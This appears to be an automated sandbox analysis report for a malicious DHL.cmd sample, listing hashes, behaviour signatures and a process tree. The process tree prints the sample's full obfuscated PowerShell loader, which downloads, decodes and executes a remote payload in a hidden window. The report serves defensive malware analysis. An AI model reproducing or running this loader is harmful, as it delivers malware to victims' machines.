Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
12-07-2024 09:37
Static task
static1
Behavioral task
behavioral1
Sample
DHL.cmd
Resource
win7-20240708-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
DHL.cmd
Resource
win10v2004-20240709-en
17 signatures
150 seconds
General
-
Target
DHL.cmd
-
Size
6KB
-
MD5
4fac338e225a33e53806bf2f27f3ed0e
-
SHA1
5e7f1620ebe0099e2c7014b2e725eefbdaecab85
-
SHA256
1825ea48164cc22c0872fea1d7ed7698d8ac439c8404207db2234cdc2b95f1ba
-
SHA512
cdeee8abcf1153740d8d1c0cc82c23c2f4b71fb6335b4fa1c3c5bf4838a0186f8043b3b5223c8d13c62c777be7cb8df2ef12a617485cdf61c527e2d5f5888844
-
SSDEEP
192:YWFEaVQEQKcwglcCy6XnU/pTmAaelT2dvmf:ThuZXGCyWU/praeIdvW
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 64 IoCs
Processes:
powershell.exeflow pid process 5 3004 powershell.exe 6 3004 powershell.exe 7 3004 powershell.exe 8 3004 powershell.exe 9 3004 powershell.exe 10 3004 powershell.exe 11 3004 powershell.exe 12 3004 powershell.exe 13 3004 powershell.exe 14 3004 powershell.exe 15 3004 powershell.exe 16 3004 powershell.exe 17 3004 powershell.exe 18 3004 powershell.exe 19 3004 powershell.exe 20 3004 powershell.exe 21 3004 powershell.exe 22 3004 powershell.exe 23 3004 powershell.exe 24 3004 powershell.exe 25 3004 powershell.exe 26 3004 powershell.exe 27 3004 powershell.exe 28 3004 powershell.exe 29 3004 powershell.exe 30 3004 powershell.exe 31 3004 powershell.exe 32 3004 powershell.exe 33 3004 powershell.exe 34 3004 powershell.exe 35 3004 powershell.exe 36 3004 powershell.exe 37 3004 powershell.exe 38 3004 powershell.exe 39 3004 powershell.exe 40 3004 powershell.exe 41 3004 powershell.exe 42 3004 powershell.exe 43 3004 powershell.exe 44 3004 powershell.exe 45 3004 powershell.exe 46 3004 powershell.exe 47 3004 powershell.exe 48 3004 powershell.exe 49 3004 powershell.exe 50 3004 powershell.exe 51 3004 powershell.exe 52 3004 powershell.exe 53 3004 powershell.exe 54 3004 powershell.exe 55 3004 powershell.exe 56 3004 powershell.exe 57 3004 powershell.exe 58 3004 powershell.exe 59 3004 powershell.exe 60 3004 powershell.exe 61 3004 powershell.exe 62 3004 powershell.exe 63 3004 powershell.exe 64 3004 powershell.exe 65 3004 powershell.exe 66 3004 powershell.exe 67 3004 powershell.exe 68 3004 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 3004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3004 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 2136 wrote to memory of 3004 2136 cmd.exe powershell.exe PID 2136 wrote to memory of 3004 2136 cmd.exe powershell.exe PID 2136 wrote to memory of 3004 2136 cmd.exe powershell.exe PID 3004 wrote to memory of 2688 3004 powershell.exe cmd.exe PID 3004 wrote to memory of 2688 3004 powershell.exe cmd.exe PID 3004 wrote to memory of 2688 3004 powershell.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "write 'Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne';If (${host}.CurrentCulture) {$Truncus++;}$Euforisering='SUBsTR';$Euforisering+='ing';Function Bleens($Nedrakkes){$timetalsreduktionens=$Nedrakkes.Length-$Truncus;For( $Ryotwary=4;$Ryotwary -lt $timetalsreduktionens;$Ryotwary+=5){$Mandlige+=$Nedrakkes.$Euforisering.Invoke( $Ryotwary, $Truncus);}$Mandlige;}function Eddied($Handrail){ . ($Gidseltageres) ($Handrail);}$Personifikationers137=Bleens ' MetM DokoImmazFagmi,ryslIntrl Af.aBe,y/Brud5 Rec. eac0Vild ,up(ArusWReceiUs ln ispdStamoNodewF resCogn ,raaNPassT,pgj Stfo1Crib0 St,.Soap0Zi.c;Sind LesiWame.iSludn Nar6Resq4 tla;Refu SystxRavn6Spar4.rug;Skv. AarsrAl.avTil :Indv1Cero2Hold1Lemm.B.ar0Prog) .or TypGMa me G.mcWamakTilhoAnt./For,2Toet0 Fo.1.oin0Tr,d0Udle1Pred0Spyg1Micr UngeF D miHalvr JogeMandfSkolo Kilxfors/ ecu1E.tr2 In 1 rl.Re t0Tamt ';$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';$Theologised77=Bleens 'Bog.h AentFiddtAtalp .nds Mon:Eman/Stng/Ussee H.mcswaroEndenBracsSladt Di,rSoutaLittm None CatdFatuioo.iaSu s.Fod,cGeneoklismor.h/MisdBUrovrKrisn Bude UdvbMancyRokkg Freg ,elesig.rSteriUn.e.D bbmVanvsUnbooSvig ';$Willowiness=Bleens 'Stet> ka ';$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';$Fissens='Mjsom';$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasmDest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';Eddied (Bleens ' nc$ ling Ac,lTilbo Coeb undaBiv.l.sta: Un,CU,deoMiset BonaPo inA,ho=Kaza(AvescAerom.rridI.dt Indl/MagecJaco skep$La eS SubtThiur.maaoKr.kmLocobL.ukuUdsksbeto)Angl ');Eddied (Bleens 'Metr$.lfag Syml VedoUnd bCiana ScolVic.:MeshMsal uFaullT qut Quai Elym Wakaforbt ,abe S.i3Broi8.mso=Flet$ PetT Burh shae.yndoTam,l,rivoDev,g,roqiSsl sVoc e CondS ak7Prod7Oms,.Ceras M sp ,eclGloriA,metMel (Balm$SaimWAppliFjerl kralLateoSplewNortiSebanCoffeAmtssG.uns For) Men ');Eddied (Bleens 'Hemi[TornNParaeR iltN,ve.M.gnSTi,eeraffrTricvMu,ri ExocTatoe.issPBisto KoniArkinredet ,alMCapiaS.ymn b sa,illgVatne Knir Tsu]Bacc:Varv: LumSQ.areJordc S,puReshrU ntiSyn,tIne yLumbPK.agrB.gyoT.ixtOveroUnmucEngioFloelMad No,d= Sca cha [WhipNIm.ee atat Men.FusiSUmque.itacLatruAntir Inci By.tA.foy toaPEpi rSoveoBesmtTot o Autc OmboBarolIn,mT Pr yStr.pR seeFoug]F,rt:,ilo:SlgtTUndelBanas an1Blet2Zeuc ');$Theologised77=$Multimate38[0];$Nonmultiple= (Bleens 'dr.a$ negKatel,fflo NumbBjrnaEnchlMisk:DeteUSax hBaf yE,sfrgil lCambi P eg poreF li=AspiN Elaecamiw ys-o,taOUnfrb,ubij.ermeFunkcPiketTurd Ov rSChriyHumpsSnapt FaceNonvm Kul.FyriN ,ndeRekltJoe,. HolWClameBldtbDe eCMarslS ioiDisce ,vinPoget');$Nonmultiple+=$Cotan[1];Eddied ($Nonmultiple);Eddied (Bleens 'Vide$VideURenuh PrayS.itr semlUn,oi ud.g ared,oe. eksH OrleImplaVentd nineFaldrProds C.e[kaut$CrysAHenhfUntifFlora MurlPlend .hisQuo.bRemorSsygsRea.eDe irShi 1Ton.7Sup,1Glau]Soci=Fro,$VictPflj,eInd,r Ti s D poSprinUnc,ia,raf.ouriThank,okaaWintt HepiUnt.oTordnSt.aeDr grDatas Cul1 Sko3Cong7Prte ');$Unto=Bleens ' awk$UdpeUSugnhAccey Ba,rVa.olPyraiRidagForbeEn.e. Mi DSkruoRemaw FernVenalArreo HelaTilbd .ntF ConiAalelMataeTre.(Skot$Sl,mTrrinhSacreMegaoFredlGaaeoBiltg,ordi ertsAegtePa edImpa7 Sol7M.cr,H,rd$Sy.kGK.isa ,ndrP.eae,uglwFosfa holiIsogtSuleeHusu)F.rs ';$Garewaite=$Cotan[0];Eddied (Bleens 'Zoha$Ha,cgIndilMirio lkkbSil.aB jdl arr:CeteWL.pao BiloFolkd St.hFngseS.nswCha,eSp.irArie=Ford(FastTTelee FlasSkamtSyds-CurePSkibaSelvtY erhBrnd Pre,$AdlyGFirsagr.drPinkeTumlwProdaanteiSchitDeadeAar.)gett ');while (!$Woodhewer) {Eddied (Bleens 'Vamo$ForegServllivsoSmilbH,emaRenslLute:PurlGSkr,otensn igaesoppSpktoSohodD tr=Umbr$Mil,tBorerUn.lu refe Mac ') ;Eddied $Unto;Eddied (Bleens 'EfteS EndtUnbia orerGl,stMynd-UninSSmatlCrose Cale.aukpBesk Para4H,da ');Eddied (Bleens 'Di,e$Forkg NullA,tooK,nsbHoveaM,rdlIndd: mpWOutfoBesmoUnc,d .urh FuneD,arwropee,oleroct,=outb( DetTUniceRuins LovtAfsk-undkPRebeaB.sotPhonhUdra To,$ TabGNiv.aOlymrPrimeElsewPresaOrgaiBlovtWogheMa t)indk ') ;Eddied (Bleens 'Al.e$ Regg SkolUniooForgbRingaflukl M s: KakSGloscB odaRev.lDistePreer P.osSk,v=Iacc$ UvigTu.ilJerkoGulnbra taFej l Sti:CresKG,gsa A.bnBr,dnPo.ei GrnbProba nmlMissiIntesTrummE.eneCigascapi+Mynp+bolt%Endr$GabeMAtteu Si l s,stAndeiFab mnd naAtritBagge Kap3 Kom8Tapp. PrecGni oM tiuSkygnPopltinte ') ;$Theologised77=$Multimate38[$Scalers];}$Grafikindhold=298359;$demodulatorers=27193;Eddied (Bleens ' Skr$K ligken.lOogoo DypbR.vaaRevolDia :,onbFAilmoVerdr.owehFje.a AfbnBewidPredlHoroe GarrRemisDeteaTryplPre,g.nde Aage=Lykk IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntractAfd In.t$Pe cG.aviaEj.tr F reA ndwUvilaZymoiMartt UnieMale ');Eddied (Bleens 'Beau$conggAngil DaloV.jbbBalnaredil Cit:InteUKonfnPrecw uneiLithsKreshInv fVedhu gral am2Term3Hjem3Nonf Vaad=Snke Kok[ViiiSEndoyBrodsMyrrt itheM nom liz.JenfC N.do .rtn PalvStemeUmorrCelet Kr ]Alle:nest: ValFPlutrsk,ioK.udmbrubBGrana .ins B,geShor6r ar4F,rsSFuldtKan.r CabiJagenO.tagUnme(Py,a$ alF Tr.oHidfr SirhNoira Pr n,ackdBetylSupee AfvrAktisEntra,hadlLandg Ban)hftb ');Eddied (Bleens ' con$ nhegP lilBarwoAp,ebEm,saSnowl Par: ParDM inyClarbkiloe Cryl hipsAden Gri,=Ugem ill[TuliSEnvey CrasbogwtSc.tedambm ,mu.ProsT TareEscaxAntitB,ho. ShiE ,qunSel cLskuoDeted,apyiLgeknPresgSu.a] Gem:Funk:UnbeAKataSAminC,urtIdiabIu fo.frilGTidseRaftt S,eS ultQuarrRegaiTricnsiphg.lka( Bug$ SmaUBo,tnCondwSnici esosDaglhGoldfAppruT.aflInbo2 ag3Poly3Hero)Brea ');Eddied (Bleens ' dde$ alg o.glTrynoPentbPrveaSvinl,dst:TidsaKettlSvinbYmteiAfmrnAlfeiLiths Su.mbec.=T.yl$ KarDMurayGen.b dvie C olovers,ore. KnosAntruDuodbGenlsNon t eslr AssiScannBombgTur,( Wei$ KloGSkytrSkria tenf ciriKr lkNeweiG.ninCa.adMogohH poo katlTramdbrai, Je.$Zymod RudeOmsvmmarko abd S.tuPenglEnviap lotDragoGus r FabeTheer IndsBomb)Rini ');Eddied $albinism;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"3⤵PID:2688